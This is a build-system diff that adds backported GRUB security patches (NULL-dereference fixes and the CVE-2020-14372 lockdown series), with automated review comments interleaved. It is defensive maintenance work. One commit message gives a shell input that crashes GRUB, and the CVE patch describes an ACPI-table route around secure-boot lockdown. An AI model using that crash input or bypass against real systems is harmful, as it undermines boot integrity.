+ *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
+ err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
+ &src, target);
+ if (err)
+- return err;
++ goto fail;
+
+ /* Put real data in the dummy. */
+ extdesc->addr = *target;
+@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ /* Write the tree to heap. */
+ grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
+ return GRUB_ERR_NONE;
++
++ fail:
++ memorymap->first_child = NULL;
++
++ grub_free (driverkey->data);
++ grub_free (driverkey->name);
++ grub_free (driverkey);
++
++ return err;
+ }
+
+ /* Find a key or value in parent key. */
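Review bot: The new `fail:` path in grub_xnu_writetree_toheap sets `memorymap->first_child = NULL` unconditionally, which looks wrong for every jump that reaches it. The first `goto fail` (after `grub_strdup ("DeviceTree")` fails) happens before `driverkey` has been linked in, and the later ones happen after `driverkey->next` has taken over the previous head, so in both cases any children `memorymap` already had are dropped from the tree instead of being restored. Whether `memorymap` can have children at this point depends on code above the hunk, so this is worth confirming. Unlinking only the new node keeps the list intact: `if (memorymap->first_child == driverkey) memorymap->first_child = driverkey->next;`.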
diff --git a/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
new file mode 100644
index 0000000000..8081f7763a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
+From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 30 Nov 2020 10:36:00 -0300
+Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
+
+Fixes: CID 73654
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 39ceff8..adc048c 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ char *name, *nameend;
+ int namelen;
+
++ if (infoplistname == NULL)
++ return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
++
+ name = get_name_ptr (infoplistname);
+ nameend = grub_strchr (name, '/');
+
+@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ else
+ macho = 0;
+
+- if (infoplistname)
+- infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+- else
+- infoplist = 0;
++ infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+ grub_errno = GRUB_ERR_NONE;
+ if (infoplist)
+ {
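Review bot: The early return added at the top of grub_xnu_load_driver turns a NULL `infoplistname` into a hard error, whereas the branch removed in the second hunk (`if (infoplistname) ... else infoplist = 0;`) treated NULL as "no Info.plist" and continued with the binary alone. If any caller passes NULL deliberately, that caller now fails with "missing p-list filename"; the callers are outside this hunk, so they need checking before this is backported. It is also not visible whether `binaryfile` is owned by this function, in which case the new return path would need to close it. At minimum I would state the new contract above the check: `/* infoplistname is mandatory: it is passed to get_name_ptr() and grub_file_open() below. */`.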
diff --git a/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
new file mode 100644
index 0000000000..ea563a41a0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
+From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
+From: Daniel Kiper <daniel.kiper@oracle.com>
+Date: Thu, 25 Feb 2021 18:35:01 +0100
+Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
+
+Two grub_device_open() calls does not have associated NULL checks
+for returned values. Fix that and appease the Coverity.
+
+Fixes: CID 314583
+
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-install.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/util/grub-install.c b/util/grub-install.c
+index a82725f..367350f 100644
+--- a/util/grub-install.c
++++ b/util/grub-install.c
+@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
+ fill_core_services (core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, core_services, 0);
+
+@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
+ fill_core_services(core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, boot_efi, 1);
+ if (!removable && update_nvram)
diff --git a/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
new file mode 100644
index 0000000000..0cd8ec3611
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
+From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 14:33:50 +0000
+Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
+
+The return value of ftell() may be negative (-1) on error. While it is
+probably unlikely to occur, we should not blindly cast to an unsigned
+value without first testing that it is not negative.
+
+Fixes: CID 73856
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-editenv.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-editenv.c b/util/grub-editenv.c
+index f3662c9..db6f187 100644
+--- a/util/grub-editenv.c
++++ b/util/grub-editenv.c
+@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
+ {
+ FILE *fp;
+ char *buf;
++ long loc;
+ size_t size;
+ grub_envblk_t envblk;
+
+@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
+ grub_util_error (_("cannot seek `%s': %s"), name,
+ strerror (errno));
+
+- size = (size_t) ftell (fp);
++ loc = ftell (fp);
++ if (loc < 0)
++ grub_util_error (_("cannot get file location `%s': %s"), name,
++ strerror (errno));
++
++ size = (size_t) loc;
+
+ if (fseek (fp, 0, SEEK_SET) < 0)
+ grub_util_error (_("cannot seek `%s': %s"), name,
diff --git a/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
new file mode 100644
index 0000000000..66d7c0aa42
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
+From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:04:28 +0000
+Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
+
+It is possible for the ftell() function to return a negative value,
+although it is fairly unlikely here, we should be checking for
+a negative value before we assign it to an unsigned value.
+
+Fixes: CID 73744
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/glue-efi.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/util/glue-efi.c b/util/glue-efi.c
+index 68f5316..de0fa6d 100644
+--- a/util/glue-efi.c
++++ b/util/glue-efi.c
+@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
+ struct grub_macho_fat_header head;
+ struct grub_macho_fat_arch arch32, arch64;
+ grub_uint32_t size32, size64;
++ long size;
+ char *buf;
+
+ fseek (in32, 0, SEEK_END);
+- size32 = ftell (in32);
++ size = ftell (in32);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name32, strerror (errno));
++ size32 = (grub_uint32_t) size;
+ fseek (in32, 0, SEEK_SET);
++
+ fseek (in64, 0, SEEK_END);
+- size64 = ftell (in64);
++ size = ftell (in64);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name64, strerror (errno));
++ size64 = (grub_uint64_t) size;
+ fseek (in64, 0, SEEK_SET);
+
+ head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);
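Review bot: In write_fat the second assignment reads `size64 = (grub_uint64_t) size;` although `size64` is declared as `grub_uint32_t` on the line above the added `long size;`, so the cast does not match the variable and the value is narrowed implicitly; it should mirror the first one, `size64 = (grub_uint32_t) size;`. The new test only rejects negative results, so where `long` is 64 bits an input larger than 4 GiB still passes and is silently truncated before it is written into the fat header. Checking the upper bound in the same condition closes that: `if (size < 0 || (unsigned long) size > 0xffffffffUL)`. The `fseek` calls around both `ftell` calls still ignore their return values.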
diff --git a/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
new file mode 100644
index 0000000000..b279222fff
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
+From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 3 Apr 2020 23:05:13 +1100
+Subject: [PATCH] script/execute: Fix NULL dereference in
+ grub_script_execute_cmdline()
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 7e028e1..5ea2aef 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
+ struct grub_script_argv argv = { 0, 0, 0 };
+
+ /* Lookup the command. */
+- if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
++ if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
+ return grub_errno;
+
+ for (i = 0; i < argv.argc; i++)
diff --git a/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
new file mode 100644
index 0000000000..5a327fe1d2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
+From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 16:57:37 +1100
+Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
+
+This can be triggered with:
+ ls -l (0 0*)
+and causes a NULL deref in grub_normal_print_device_info().
+
+I'm not sure if there's any implication with the IEEE 1275 platform.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/ls.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
+index 5b7491a..326d2d6 100644
+--- a/grub-core/commands/ls.c
++++ b/grub-core/commands/ls.c
+@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
+ goto fail;
+ }
+
+- if (! *path)
++ if (! *path && device_name)
+ {
+ if (grub_errno == GRUB_ERR_UNKNOWN_FS)
+ grub_errno = GRUB_ERR_NONE;
diff --git a/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
new file mode 100644
index 0000000000..84117a9073
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
+From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 17:30:42 +1100
+Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
+ function scope
+
+"$#" represents the number of arguments to a function. It is only
+defined in a function scope, where "scope" is non-NULL. Currently,
+if we attempt to evaluate "$#" outside a function scope, "scope" will
+be NULL and we will crash with a NULL pointer dereference.
+
+Do not attempt to count arguments for "$#" if "scope" is NULL. This
+will result in "$#" being interpreted as an empty string if evaluated
+outside a function scope.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 5ea2aef..23d34bd 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
+ return 0;
+
+ /* Enough for any number. */
+- if (len == 1 && str[0] == '#')
++ if (len == 1 && str[0] == '#' && scope != NULL)
+ {
+ grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
+ *ptr += grub_strlen (*ptr);
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
index 896a2145d4..7214ead9a7 100644
--- a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
@@ -30,7 +30,7 @@ Signed-off-by: Peter Jones <pjones@redhat.com>
Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
Upstream-Status: Backport
-CVE: CVE-2020-14309, CVE-2020-14310, CVE-2020-14311
+CVE: CVE-2020-14309 CVE-2020-14310 CVE-2020-14311
Reference to upstream patch:
https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3f05d693d1274965ffbe4ba99080dc2c570944c6
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
new file mode 100644
index 0000000000..08e7666cde
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
+From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:41 +0200
+Subject: [PATCH] acpi: Don't register the acpi command when locked down
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The command is not allowed when lockdown is enforced. Otherwise an
+attacker can instruct the GRUB to load an SSDT table to overwrite
+the kernel lockdown configuration and later load and execute
+unsigned code.
+
+Fixes: CVE-2020-14372
+
+Reported-by: Máté Kukri <km@mkukri.xyz>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 5 +++++
+ grub-core/commands/acpi.c | 15 ++++++++-------
+ 2 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 0786427..47ac7ff 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
+ (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
+ @option{--no-ebda} option is used, the new tables will be known only to
+ GRUB, but may be used by GRUB's EFI emulation.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ Otherwise an attacker can instruct the GRUB to load an SSDT table to
++ overwrite the kernel lockdown configuration and later load and execute
++ unsigned code.
+ @end deffn
+
+
+diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
+index 5a1499a..1215f2a 100644
+--- a/grub-core/commands/acpi.c
++++ b/grub-core/commands/acpi.c
+@@ -27,6 +27,7 @@
+ #include <grub/mm.h>
+ #include <grub/memory.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ #ifdef GRUB_MACHINE_EFI
+ #include <grub/efi/efi.h>
+@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(acpi)
+ {
+- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
+- N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
+- "--load-only=TABLE1,TABLE2] FILE1"
+- " [FILE2] [...]"),
+- N_("Load host ACPI tables and tables "
+- "specified by arguments."),
+- options);
++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
++ "--load-only=TABLE1,TABLE2] FILE1"
++ " [FILE2] [...]"),
++ N_("Load host ACPI tables and tables "
++ "specified by arguments."),
++ options);
+ }
+
+ GRUB_MOD_FINI(acpi)
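Review bot: This patch depends on code that is only added by a later-named file: it includes `grub/lockdown.h` and calls `grub_register_extcmd_lockdown`, and the description of CVE-2020-14372_2.patch ("kern: Add lockdown support") lists the `grub_{command,extcmd}_lockdown` functions as new in that patch. The file names therefore suggest the opposite of the order in which the patches have to apply. The recipe's SRC_URI is not part of this hunk; it should list the `_1` and `_2` files before this one, otherwise the acpi module will not build and the fix for the CVE is not actually in the image. A short comment in the recipe next to the three entries stating the required order would keep a later re-sort from breaking it.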
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
new file mode 100644
index 0000000000..745f335501
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
+From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Wed, 23 Sep 2020 11:33:33 -0400
+Subject: [PATCH] verifiers: Move verifiers API to kernel image
+
+Move verifiers API from a module to the kernel image, so it can be
+used there as well. There are no functional changes in this patch.
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/Makefile.am | 1 +
+ grub-core/Makefile.core.def | 6 +-----
+ grub-core/kern/main.c | 4 ++++
+ grub-core/{commands => kern}/verifiers.c | 8 ++------
+ include/grub/verify.h | 9 ++++++---
+ 5 files changed, 14 insertions(+), 14 deletions(-)
+ rename grub-core/{commands => kern}/verifiers.c (97%)
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 3ea8e7f..375c30d 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 474a63e..cff02f2 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -140,6 +140,7 @@ kernel = {
+ common = kern/rescue_parser.c;
+ common = kern/rescue_reader.c;
+ common = kern/term.c;
++ common = kern/verifiers.c;
+
+ noemu = kern/compiler-rt.c;
+ noemu = kern/mm.c;
+@@ -942,11 +943,6 @@ module = {
+ cppflags = '-I$(srcdir)/lib/posix_wrap';
+ };
+
+-module = {
+- name = verifiers;
+- common = commands/verifiers.c;
+-};
+-
+ module = {
+ name = shim_lock;
+ common = commands/efi/shim_lock.c;
+diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
+index 9cad0c4..73967e2 100644
+--- a/grub-core/kern/main.c
++++ b/grub-core/kern/main.c
+@@ -29,6 +29,7 @@
+ #include <grub/command.h>
+ #include <grub/reader.h>
+ #include <grub/parser.h>
++#include <grub/verify.h>
+
+ #ifdef GRUB_MACHINE_PCBIOS
+ #include <grub/machine/memory.h>
+@@ -274,6 +275,9 @@ grub_main (void)
+ grub_printf ("Welcome to GRUB!\n\n");
+ grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
+
++ /* Init verifiers API. */
++ grub_verifiers_init ();
++
+ grub_load_config ();
+
+ grub_boot_time ("Before loading embedded modules.");
+diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
+similarity index 97%
+rename from grub-core/commands/verifiers.c
+rename to grub-core/kern/verifiers.c
+index 0dde481..aa3dc7c 100644
+--- a/grub-core/commands/verifiers.c
++++ b/grub-core/kern/verifiers.c
+@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
+ return GRUB_ERR_NONE;
+ }
+
+-GRUB_MOD_INIT(verifiers)
++void
++grub_verifiers_init (void)
+ {
+ grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
+ }
+-
+-GRUB_MOD_FINI(verifiers)
+-{
+- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
+-}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index ea04914..cd129c3 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -64,7 +64,10 @@ struct grub_file_verifier
+ grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
+ };
+
+-extern struct grub_file_verifier *grub_file_verifiers;
++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
++
++extern void
++grub_verifiers_init (void);
+
+ static inline void
+ grub_verifier_register (struct grub_file_verifier *ver)
+@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
+ grub_list_remove (GRUB_AS_LIST (ver));
+ }
+
+-grub_err_t
+-grub_verify_string (char *str, enum grub_verify_string_type type);
++extern grub_err_t
++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
+
+ #endif /* ! GRUB_VERIFY_HEADER */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
+From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:02 +0200
+Subject: [PATCH] kern: Add lockdown support
+
+When the GRUB starts on a secure boot platform, some commands can be
+used to subvert the protections provided by the verification mechanism and
+could lead to booting untrusted system.
+
+To prevent that situation, allow GRUB to be locked down. That way the code
+may check if GRUB has been locked down and further restrict the commands
+that are registered or what subset of their functionality could be used.
+
+The lockdown support adds the following components:
+
+* The grub_lockdown() function which can be used to lockdown GRUB if,
+ e.g., UEFI Secure Boot is enabled.
+
+* The grub_is_lockdown() function which can be used to check if the GRUB
+ was locked down.
+
+* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
+ tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
+ verifiers. These files are only successfully verified if another registered
+ verifier returns success. Otherwise, the whole verification process fails.
+
+ For example, PE/COFF binaries verification can be done by the shim_lock
+ verifier which validates the signatures using the shim_lock protocol.
+ However, the verification is not deferred directly to the shim_lock verifier.
+ The shim_lock verifier is hooked into the verification process instead.
+
+* A set of grub_{command,extcmd}_lockdown functions that can be used by
+ code registering command handlers, to only register unsafe commands if
+ the GRUB has not been locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.common | 2 +
+ docs/grub-dev.texi | 27 +++++++++++++
+ docs/grub.texi | 8 ++++
+ grub-core/Makefile.am | 5 ++-
+ grub-core/Makefile.core.def | 1 +
+ grub-core/commands/extcmd.c | 23 +++++++++++
+ grub-core/kern/command.c | 24 +++++++++++
+ grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++
+ include/grub/command.h | 5 +++
+ include/grub/extcmd.h | 7 ++++
+ include/grub/lockdown.h | 44 ++++++++++++++++++++
+ 11 files changed, 225 insertions(+), 1 deletion(-)
+ create mode 100644 grub-core/kern/lockdown.c
+ create mode 100644 include/grub/lockdown.h
+
+diff --git a/conf/Makefile.common b/conf/Makefile.common
+index 6cd71cb..2a1a886 100644
+--- a/conf/Makefile.common
++++ b/conf/Makefile.common
+@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
+ CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
